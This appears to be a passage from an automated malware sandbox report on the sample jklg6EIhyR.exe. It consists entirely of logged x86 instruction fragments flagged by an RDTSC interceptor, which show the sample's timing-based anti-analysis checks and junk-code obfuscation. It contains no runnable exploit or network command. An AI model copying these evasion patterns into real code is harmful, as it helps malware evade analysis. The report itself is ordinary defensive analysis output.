Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1047D97 second address: 1047D9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101453C second address: 101454B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F78B909B0F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101454B second address: 1014565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1014565 second address: 10145AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F78B909B10Eh 0x0000000f jc 00007F78B909B113h 0x00000015 jmp 00007F78B909B0FDh 0x0000001a jmp 00007F78B909B100h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10145AF second address: 10145B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 104D986 second address: 104D9B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 pushad 0x0000000a je 00007F78B909B0F6h 0x00000010 jmp 00007F78B909B104h 0x00000015 popad 0x00000016 push ebx 0x00000017 je 00007F78B909B0F6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 104D13C second address: 104D140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 104D140 second address: 104D14C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F78B909B0F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 104D14C second address: 104D151 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 104D804 second address: 104D82C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B104h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F78B909B100h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1050DD0 second address: 1050DDA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F78B9095CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1050E43 second address: 1050E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B909B0FBh 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F78B909B107h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007F78B909B0F8h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1050E79 second address: 1050E99 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F78B9095CF6h 0x00000008 jmp 00007F78B9095CF0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [eax] 0x00000011 push ecx 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1050E99 second address: 1050EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1050EA7 second address: 1050EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1050EAF second address: 1050ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F78B909B0F6h 0x0000000a popad 0x0000000b popad 0x0000000c pop eax 0x0000000d mov edi, 2A77E7A1h 0x00000012 mov dword ptr [ebp+12A01BAFh], ebx 0x00000018 push 7B38BB2Bh 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 pop edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10511F4 second address: 105120D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 105120D second address: 1051212 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1051A87 second address: 1051A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1051A8B second address: 1051AA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B104h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1051AA9 second address: 1051AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1051AAD second address: 1051AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 xchg eax, ebx 0x00000008 call 00007F78B909B109h 0x0000000d mov dword ptr [ebp+12BAFEE4h], esi 0x00000013 pop edi 0x00000014 nop 0x00000015 jmp 00007F78B909B0FAh 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jno 00007F78B909B0F6h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1051AEB second address: 1051AF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1052580 second address: 1052584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1052584 second address: 105258A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1052E2B second address: 1052E3C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F78B909B0F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1053FB5 second address: 1053FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 105360B second address: 1053622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B909B102h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1054ACF second address: 1054AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1054AD5 second address: 1054ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1054ADA second address: 1054B40 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor dword ptr [ebp+12A01886h], ecx 0x00000011 mov esi, dword ptr [ebp+12A0321Ch] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F78B9095CE8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 call 00007F78B9095CF0h 0x00000038 pushad 0x00000039 mov si, ax 0x0000003c mov ecx, 41AC0F81h 0x00000041 popad 0x00000042 pop edi 0x00000043 push 00000000h 0x00000045 jp 00007F78B9095CECh 0x0000004b xchg eax, ebx 0x0000004c pushad 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1054B40 second address: 1054B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10555CD second address: 10555E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop esi 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jnc 00007F78B9095CE6h 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10555E2 second address: 10555ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F78B909B0F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10555ED second address: 1055651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F78B9095CE8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 mov edi, dword ptr [ebp+12A03713h] 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push esi 0x0000002d call 00007F78B9095CE8h 0x00000032 pop esi 0x00000033 mov dword ptr [esp+04h], esi 0x00000037 add dword ptr [esp+04h], 00000015h 0x0000003f inc esi 0x00000040 push esi 0x00000041 ret 0x00000042 pop esi 0x00000043 ret 0x00000044 push 00000000h 0x00000046 jno 00007F78B9095CE6h 0x0000004c xchg eax, ebx 0x0000004d push eax 0x0000004e push edx 0x0000004f jc 00007F78B9095CE8h 0x00000055 push esi 0x00000056 pop esi 0x00000057 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1055651 second address: 105566E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F78B909B102h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 105566E second address: 1055674 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1055674 second address: 1055679 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1055EC7 second address: 1055ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10593FB second address: 1059400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1059400 second address: 105947D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F78B9095CECh 0x00000008 jnc 00007F78B9095CE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov dword ptr [ebp+12B8EDC2h], eax 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F78B9095CE8h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 movsx ebx, si 0x00000038 movzx ebx, bx 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push esi 0x00000040 call 00007F78B9095CE8h 0x00000045 pop esi 0x00000046 mov dword ptr [esp+04h], esi 0x0000004a add dword ptr [esp+04h], 00000014h 0x00000052 inc esi 0x00000053 push esi 0x00000054 ret 0x00000055 pop esi 0x00000056 ret 0x00000057 mov ebx, dword ptr [ebp+12A02FECh] 0x0000005d xchg eax, esi 0x0000005e jmp 00007F78B9095CF0h 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 push ebx 0x00000067 jnc 00007F78B9095CE6h 0x0000006d pop ebx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 105738E second address: 1057393 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 105D2D1 second address: 105D2D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1059637 second address: 105963D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 105963D second address: 1059643 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1060438 second address: 106045E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F78B909B108h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 106045E second address: 106049C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F78B9095CECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov ebx, ecx 0x0000000d push 00000000h 0x0000000f clc 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F78B9095CE8h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c mov di, dx 0x0000002f xchg eax, esi 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 106049C second address: 10604A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 105A755 second address: 105A759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 105C4C1 second address: 105C4FA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 push dword ptr fs:[00000000h] 0x0000000f mov dword ptr fs:[00000000h], esp 0x00000016 and edi, 6F7129CEh 0x0000001c mov eax, dword ptr [ebp+12A00F41h] 0x00000022 and ebx, dword ptr [ebp+12A035D7h] 0x00000028 push FFFFFFFFh 0x0000002a mov di, D991h 0x0000002e nop 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 jnl 00007F78B909B0F6h 0x00000038 pop eax 0x00000039 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 105C4FA second address: 105C500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 105C500 second address: 105C504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 105C504 second address: 105C508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 105A759 second address: 105A7DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jo 00007F78B909B102h 0x0000000e jmp 00007F78B909B0FCh 0x00000013 push dword ptr fs:[00000000h] 0x0000001a add edi, dword ptr [ebp+12A037C7h] 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007F78B909B0F8h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 00000019h 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov eax, dword ptr [ebp+12A00229h] 0x00000047 push 00000000h 0x00000049 push ebx 0x0000004a call 00007F78B909B0F8h 0x0000004f pop ebx 0x00000050 mov dword ptr [esp+04h], ebx 0x00000054 add dword ptr [esp+04h], 00000015h 0x0000005c inc ebx 0x0000005d push ebx 0x0000005e ret 0x0000005f pop ebx 0x00000060 ret 0x00000061 mov bh, al 0x00000063 push FFFFFFFFh 0x00000065 sub dword ptr [ebp+12A031ECh], ecx 0x0000006b push eax 0x0000006c jbe 00007F78B909B100h 0x00000072 pushad 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1064403 second address: 1064412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F78B9095CEEh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 100A737 second address: 100A73C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 100A73C second address: 100A748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F78B9095CE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 106605F second address: 1066063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1066063 second address: 10660F5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F78B9095CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F78B9095CF5h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F78B9095CE8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov dword ptr [ebp+12A01A1Fh], eax 0x00000032 push 00000000h 0x00000034 mov ebx, dword ptr [ebp+12A01BAFh] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push esi 0x0000003f call 00007F78B9095CE8h 0x00000044 pop esi 0x00000045 mov dword ptr [esp+04h], esi 0x00000049 add dword ptr [esp+04h], 00000018h 0x00000051 inc esi 0x00000052 push esi 0x00000053 ret 0x00000054 pop esi 0x00000055 ret 0x00000056 xchg eax, esi 0x00000057 jmp 00007F78B9095CF7h 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jo 00007F78B9095CE8h 0x00000065 push esi 0x00000066 pop esi 0x00000067 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 106065D second address: 10606E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, edi 0x0000000b mov dword ptr [ebp+12BAFE63h], edi 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov ebx, dword ptr [ebp+12A03933h] 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007F78B909B0F8h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f mov edi, 0C322F95h 0x00000044 mov eax, dword ptr [ebp+12A00ADDh] 0x0000004a push 00000000h 0x0000004c push edi 0x0000004d call 00007F78B909B0F8h 0x00000052 pop edi 0x00000053 mov dword ptr [esp+04h], edi 0x00000057 add dword ptr [esp+04h], 00000018h 0x0000005f inc edi 0x00000060 push edi 0x00000061 ret 0x00000062 pop edi 0x00000063 ret 0x00000064 push FFFFFFFFh 0x00000066 mov ebx, eax 0x00000068 nop 0x00000069 push eax 0x0000006a push edx 0x0000006b js 00007F78B909B0FCh 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10606E0 second address: 10606E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10606E4 second address: 10606F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F78B909B101h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 105F581 second address: 105F587 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 105F587 second address: 105F5A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B105h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10682FE second address: 1068313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F78B9095CF0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1068313 second address: 1068329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F78B909B0FCh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1068329 second address: 10683C2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F78B9095CF8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F78B9095CE8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 add edi, dword ptr [ebp+12A0283Ah] 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007F78B9095CE8h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000018h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 or bx, 04EBh 0x0000004e xchg eax, esi 0x0000004f pushad 0x00000050 jnc 00007F78B9095CECh 0x00000056 jp 00007F78B9095CF4h 0x0000005c popad 0x0000005d push eax 0x0000005e pushad 0x0000005f jo 00007F78B9095CECh 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1066262 second address: 1066266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 106A459 second address: 106A470 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 106177C second address: 1061786 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F78B909B0FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 106A470 second address: 106A476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10684B9 second address: 10684BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10684BD second address: 10684C7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F78B9095CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
